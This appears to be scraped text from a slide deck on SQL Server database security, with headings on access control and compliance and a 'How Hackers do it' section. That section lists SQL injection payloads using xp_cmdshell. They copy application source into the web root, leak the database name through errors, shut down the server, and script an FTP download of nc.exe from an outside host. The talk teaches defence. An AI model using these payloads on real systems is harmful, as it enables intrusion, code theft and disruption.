Beruflich Dokumente
Kultur Dokumente
Clement Arul
CTO Mega Fortris
AGENDA
Im a . . .
BUSINESS CHALLENGES
BUSINESS NEEDS
DB VULNERABILITIES
CONTROL ACCESS
Authentication Enhancements
Authentication Features
ENSURE COMPLIANCE
Policy-Based Management
How Hackers do it ?
Note : By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005 / 2008 / R2. [If you have admin access, you can enable them]
Example 1 :
To execute a shell command that writes the output of the command dir c:\inetpub in a browseable file, assuming that the web server and the DB server reside on the same host : exec master.dbo.xp_cmdshell 'dir c:\inetpub > c:\inetpub\wwwroot\test.txt'-Alternatively, we can use sp_makewebtask: exec sp_makewebtask 'C:\Inetpub\wwwroot\test.txt', 'select * from master.dbo.sysobjects'--
Example 2 : The SQL Server built-in function db_name() can be used to trigger an error that will return the name of the database: /controlboard.asp?boardID=2&itemnum=1%20AND%201=CONVERT(int,%20db_ name()) Example 3 : Obtaining the application's source code a' ; master.dbo.xp_cmdshell ' copy c:\inetpub\wwwroot\login.aspx c:\inetpub\wwwroot\login.txt';--
Example 4 : Add new procedure (virtually you can execute whatever you want)
Example 5 : Start and stop Windows Services. xp_servicecontrol (START or STOP) <service>
Example 6 : Upload Executables Once xp_cmdshell is enabled, uploading becomes a CAT walk.
[If the target allows FTP connections, inject the following queries]:
exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';-exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';-exec master..xp_cmdshell 'echo bin >> ftpscript.txt';-exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';-exec master..xp_cmdshell 'echo quit >> ftpscript.txt';-exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
Tools =
';shutdown -
Q&A
References
Microsoft Security Development Lifecycle
http://www.microsoft.com/sdl
Security Configuration Benchmark for SQL Server 2005 & 2008 & R2
http://cisecurity.org/
clementarul@megafortris.com http://www.innov8orz.com/blog